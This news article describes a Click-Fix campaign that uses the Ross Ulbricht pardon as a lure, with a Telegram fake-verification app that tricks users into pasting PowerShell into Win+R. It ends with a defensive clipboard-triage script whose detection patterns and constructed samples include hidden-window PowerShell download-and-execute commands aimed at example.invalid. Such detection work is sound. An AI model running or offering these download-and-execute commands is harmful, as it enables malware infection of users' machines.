Threat actors on X are exploiting the news around Ross Ulbricht to direct unsuspecting users to a Telegram channel that tricks them into running PowerShell code that infects their machines with malware.
The attack, spotted by vx-underground, is a new variant of the “Click-Fix” tactic that has become very popular among threat actors to distribute malware over the past year.
However, instead of posing as a fix for a common error, this variant pretends to be a captcha or identity verification step that users must complete to join the channel.
Last month, researchers from Guardio Labs and Infoblox revealed a new campaign that used fake CAPTCHA verification pages prompting users to run PowerShell commands to "verify" they are not a bot.
Silk Road creator used as lure
Ross Ulbricht is the founder and main operator of the notorious dark web marketplace Silk Road, which acted as a hub for selling and buying illicit goods and services.
Ulbricht was sentenced to life in prison in 2015, a sentence some considered excessive given that he facilitated crimes rather than committing them personally.
President Trump had previously expressed the same view, promising to pardon Ulbricht once he became U.S. President, and yesterday he fulfilled that promise.
Threat actors took advantage of this development, using fake but verified Ross Ulbricht accounts on X to direct people to malicious Telegram channels presented as official Ulbricht portals.
On Telegram, users are met with a so-called identity verification request named 'Safeguard,' which walks them through the fake verification process.
At the end, users are shown a Telegram mini app that displays a fake verification dialog. The mini app silently copies a PowerShell command to the device's clipboard and then instructs the user to open the Windows Run dialog (Win+R), paste the clipboard contents, and press Enter.
The copied command downloads and executes a PowerShell script, which eventually retrieves a ZIP file from http://openline[.]cyou.
This ZIP contains numerous files, including identity-helper.exe [VirusTotal], which, according to a comment on VirusTotal, may be a Cobalt Strike loader.
Cobalt Strike is a commercial penetration-testing framework that threat actors frequently abuse to gain remote access to compromised computers and the networks they reside on. Infections of this type are commonly a precursor to ransomware and data-theft attacks.
The language used throughout the verification process is carefully selected to prevent raising suspicion and maintain the false verification premise.
Users should never execute anything copied from a website in the Windows 'Run' dialog or a PowerShell terminal unless they fully understand what it does.
If unsure about something on your clipboard, paste it into a plain text editor and read it before running it, treating any obfuscation (for example, Base64-encoded blobs or escaped characters) as a red flag.
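The "paste it into a text editor and read it" advice can be turned into a small triage script. The following is an added example written for this article, not code from the article, from vx-underground or from the researchers cited above; the indicator list is my own set of heuristics for the traits a Click-Fix one-liner needs (launch PowerShell, hide the window, fetch something remote, execute it in memory, or hide all of that behind -EncodedCommand or backtick escaping). The sample clipboard contents are constructed for the demonstration and point at the reserved example host example.invalid, not at the campaign's real infrastructure or payload.

```python
"""Heuristic triage of clipboard text before it is pasted into Win+R.

Added example for this article. Indicator regexes are the author's own
heuristics; the SAMPLES below are constructed and do not reproduce the
campaign's actual command.
"""
import base64
import binascii
import re

# Traits a Click-Fix one-liner needs in order to work. Names are hypothetical.
INDICATORS = {
    "powershell_launch": re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I),
    "hidden_window": re.compile(r"(?<!\S)-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "policy_bypass": re.compile(r"(?<!\S)-e(?:xecutionpolicy|p)\s+bypass\b", re.I),
    "downloader": re.compile(
        r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|"
        r"DownloadFile|Start-BitsTransfer|curl|wget|certutil|bitsadmin)\b", re.I),
    "in_memory_exec": re.compile(r"\b(?:iex|Invoke-Expression|mshta)\b", re.I),
    # Plain URLs and defanged ones like openline[.]cyou.
    "remote_url": re.compile(r"\bhttps?://\S+|\S+\[\.\]\S+", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    # Backtick-split words (i`e`x), [char] casts, string splicing, -join, .Replace(.
    "obfuscation": re.compile(
        r"`[A-Za-z]|\[char\]\s*\d+|['\"]\s*\+\s*['\"]|-join\b|\.Replace\(", re.I),
}
# -EncodedCommand and its short forms take base64 of UTF-16LE text.
ENCODED_ARG = re.compile(r"(?<!\S)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(blob):
    """Decode one -EncodedCommand argument; None if it is not base64 of UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def verdict(hits):
    """Download-and-execute chain present -> malicious; any single trait -> suspicious."""
    fetch = bool(hits & {"downloader", "remote_url"})
    run = bool(hits & {"in_memory_exec", "encoded_command", "base64_decode", "obfuscation"})
    if fetch and run:
        return "malicious"
    if hits:
        return "suspicious"
    return "benign"


def analyze_clipboard(text, max_layers=4):
    """Scan text, peel -EncodedCommand layers, and return layers, sorted hits and a verdict."""
    layers = [text]
    hits = set()
    current = text
    for _ in range(max_layers):
        # PowerShell treats i`e`x as iex; strip escape backticks so the other
        # regexes see the real token, but flag the obfuscation on the raw text.
        deobf = re.sub(r"`(?=[A-Za-z])", "", current)
        for name, pattern in INDICATORS.items():
            target = current if name == "obfuscation" else deobf
            if pattern.search(target):
                hits.add(name)
        enc = ENCODED_ARG.search(current)
        decoded = decode_encoded_command(enc.group(1)) if enc else None
        if decoded is None:
            break
        hits.add("encoded_command")
        layers.append(decoded)
        current = decoded
    return {"layers": layers, "hits": sorted(hits), "verdict": verdict(hits)}


def build_encoded_sample(inner):
    """Constructed sample: wrap a command the way -EncodedCommand expects (UTF-16LE base64)."""
    blob = base64.b64encode(inner.encode("utf-16-le")).decode("ascii")
    return f"powershell -nop -w hidden -enc {blob}"


# Constructed clipboard contents for the demonstration (not the real campaign command).
SAMPLES = {
    "benign": r"cd C:\Users\alice\Documents",
    "plain": 'powershell -w hidden -c "iex (irm http://example.invalid/verify)"',
    "encoded": build_encoded_sample("iex (irm http://example.invalid/verify)"),
    "obfuscated": "powershell -ep bypass -c \"i`e`x (New-Object Net.WebClient)"
                  ".DownloadString('http://example.invalid/v')\"",
}

if __name__ == "__main__":
    for label, clip in SAMPLES.items():
        result = analyze_clipboard(clip)
        print(f"{label:10s} {result['verdict']:10s} {result['hits']}")
        for depth, layer in enumerate(result["layers"][1:], start=1):
            print(f"{'':10s} decoded layer {depth}: {layer}")
```

The script is deliberately a reader's aid rather than a blocklist: it tells you why a pasted command looks like download-and-execute (hidden window, remote fetch, in-memory execution, an encoded or backtick-mangled payload) and shows the decoded inner command so you can read it. Anything it rates "suspicious" or "malicious" should never go anywhere near the Run dialog.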